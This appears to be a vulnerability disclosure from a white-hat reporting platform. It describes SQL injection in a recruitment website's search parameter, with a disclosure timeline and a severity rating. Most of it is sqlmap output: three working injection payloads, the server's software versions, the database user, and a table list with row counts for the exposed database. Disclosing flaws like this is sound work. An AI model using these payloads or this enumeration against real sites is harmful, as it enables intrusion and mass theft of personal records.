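2015-08-17: Details reported to the vendor; awaiting vendor handling
2015-08-20: CNCERT (the National Internet Emergency Center) has not yet been able to contact the responsible organization; details disclosed only to the notifying agency
2015-08-30: Details disclosed to core white hats and experts in related fields
2015-09-09: Details disclosed to regular white hats
2015-09-19: Details disclosed to intern white hats
2015-10-04: Details disclosed to the public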
Large volume of recruitment information leaked
Injection point
http://**.**.**.**/e/searchcompany/?id=975046
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] yjs
current database: 'yjs'
current user: 'bys@localhost'
Database: yjs
[187 tables]
I deleted some of the useless ones
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| phome_ecms_zhaopin                | 917852  |
| phome_ecms_infotmp_zhaopin        | 700799  |
| phome_ecms_zhaopin_data_2         | 636778  |
| phome_ecms_zhaopin_data_1         | 281133  |
| phome_ecms_zhaopin_doc            | 48610   |
| phome_ecms_zhaopin_doc_data       | 48610   |
| phome_enewsdolog                  | 41159   |
| phome_enewssearch                 | 28657   |
| phome_ecms_zhaopinhui             | 13576   |
| phome_ecms_zhaopinhui_data_1      | 13576   |
| phome_ecms_xuanjianghui           | 3678    |
| phome_ecms_xuanjianghui_data_1    | 3678    |
| phome_enewslog                    | 3676    |
| phome_ecms_news                   | 3630    |
| phome_ecms_news_data_1            | 3630    |
| phome_enewslinktmp                | 2792    |
| phome_ecms_infotmp_zhaopinhui     | 2223    |
| phome_ecms_infotmp_xuanjianghui   | 1101    |
| phome_enewsfile                   | 485     |
| phome_enewspl                     | 361     |
| phome_enewspl_data_1              | 361     |
| phome_enewslink                   | 141     |
| phome_ecms_infotmp_news           | 108     |
| phome_enewsinfoclass              | 65      |
| phome_ecms_infoclass_zhaopin      | 61      |
| phome_enewsf                      | 57      |
| phome_enewsbq                     | 29      |
| phome_enewskey                    | 29      |
| phome_enewsnewstemp               | 28      |
| phome_enewsuser                   | 23      |
| phome_enewsuseradd                | 23      |
| phome_enewsclass                  | 17      |
| phome_enewsbqtemp                 | 13      |
| phome_enewsmemberf                | 12      |
| phome_enewslisttemp               | 11      |
| phome_enewswriter                 | 11      |
| phome_enewsfeedbackf              | 9       |
| phome_enewsclassadd               | 8       |
| phome_enewsmember                 | 8       |
| phome_enewsmemberadd              | 8       |
| phome_enewsshoppayfs              | 6       |
| phome_enewstempvar                | 6       |
| phome_enewsjstemp                 | 5       |
| phome_enewsnotcj                  | 5       |
| phome_enewsbqclass                | 4       |
| phome_enewsdo                     | 4       |
| phome_enewslinkclass              | 4       |
| phome_enewsmembergroup            | 4       |
| phome_enewsmod                    | 4       |
| phome_enewsplayer                 | 4       |
| phome_enewsshopps                 | 4       |
| phome_enewstable                  | 4       |
| phome_enewsgroup                  | 3       |
| phome_enewspage                   | 3       |
| phome_enewspayapi                 | 3       |
| phome_enewspltemp                 | 3       |
| phome_enewstags                   | 3       |
| phome_enewsuserjs                 | 3       |
| phome_enewszt                     | 3       |
| phome_enewsztadd                  | 3       |
| phome_ecms_infoclass_news         | 2       |
| phome_enewsadclass                | 2       |
| phome_enewsadminstyle             | 2       |
| phome_enewsclasstemp              | 2       |
| phome_enewsmemberform             | 2       |
| phome_enewsspacestyle             | 2       |
| phome_enewssql                    | 2       |
| phome_enewstagsclass              | 2       |
| phome_enewstagsdata               | 2       |
| phome_enewsuserclass              | 2       |
| phome_enewsvotetemp               | 2       |
| phome_enewswapstyle               | 2       |
| phome_enewsyh                     | 2       |
| phome_ecms_infoclass_xuanjianghui | 1       |
| phome_ecms_infoclass_zhaopinhui   | 1       |
| phome_enewsfeedbackclass          | 1       |
| phome_enewsgbookclass             | 1       |
| phome_enewsloginfail              | 1       |
| phome_enewspicclass               | 1       |
| phome_enewsprinttemp              | 1       |
| phome_enewspublic                 | 1       |
| phome_enewspubtemp                | 1       |
| phome_enewsqmsg                   | 1       |
| phome_enewssearchtemp             | 1       |
| phome_enewstempgroup              | 1       |
| phome_enewsworkflow               | 1       |
| phome_enewsztclass                | 1       |
+-----------------------------------+---------+
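You are the professionals
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-08-20 08:15
A direct handling channel with the organization that manages the site has not yet been established; awaiting claim.
None yet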